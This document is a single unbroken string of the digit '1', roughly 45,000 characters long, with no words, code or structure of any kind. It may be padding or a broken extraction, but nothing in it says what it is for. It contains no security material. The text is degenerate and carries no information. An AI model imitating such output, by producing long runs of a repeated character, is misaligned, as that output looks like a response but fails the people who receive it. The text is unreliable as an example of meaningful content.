111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111